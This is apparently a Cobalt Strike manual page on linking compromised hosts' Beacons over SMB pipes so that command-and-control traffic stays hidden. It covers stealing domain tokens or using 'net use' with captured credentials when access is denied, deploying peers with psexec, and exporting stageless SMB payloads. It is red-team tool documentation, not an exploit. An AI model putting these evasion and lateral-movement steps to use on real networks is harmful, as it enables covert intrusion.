Beacon Covert Peer-to-Peer Communication
It's hard to stay hidden when many compromised systems call out to the internet. Use Beacon's peer-to-peer communication to solve this problem. This feature lets you link Beacons to each other. Linked Beacons download tasks and send output through their parent Beacon.
Use mode smb to transform a Beacon into a peer that waits for another Beacon to connect.
Use link [ip address] to link the current Beacon to a peer that is waiting for a connection. When the current Beacon checks in, its linked peers will check in too.
To blend in with normal traffic, linked Beacons use SMB pipes to communicate. There are a few caveats to this approach:
- Hosts with a Beacon peer must accept connections on port 445.
- You may only link Beacons managed by the same Cobalt Strike instance.
If you get an error 5 (access denied) when you try to link to a Beacon: steal a domain user's token or use shell net use \\host /U:DOMAIN\user password to establish a session with the host. An administrator user is not required for this. Any valid domain user will do. Once you have a session, try to link to the Beacon again.
To destroy a Beacon link use unlink [ip address] in the parent or child. Later, you may link to to the unlinked Beacon again (or link to it from another Beacon).
Once a Beacon becomes a peer, there is no way to make it beacon over HTTP or DNS again. If you'd like to kill a Beacon peer, use the exit command. If you'd like to make the host beacon over HTTP or DNS, task the Beacon peer to give you another Beacon session.
Beacon Peer as a Payload
Some systems can't talk to the internet. In these cases, it's nice to have a way to deliver a ready-to-link Beacon so you may connect to it. Use [host] -> Login -> psexec or [host] -> Login -> psexec (psh) with the beacon (connect to target) listener. This will run a Beacon peer on a host without the need to connect to the internet to stage.
You may setup a listener to deliver a peer-to-peer Beacon as well. Create a lister for windows/beacon_smb/reverse_tcp. This listener will stage your peer-to-peer Beacon. After it stages you will still need to link to it from another Beacon.
If staging is cumbersome, you may ask Cobalt Strike to export a fully staged peer-to-peer Beacon as an executable, DLL, PowerShell script, or raw blob of shellcode. Go to Payloads -> Windows Stageless Payload and select SMB Beacon.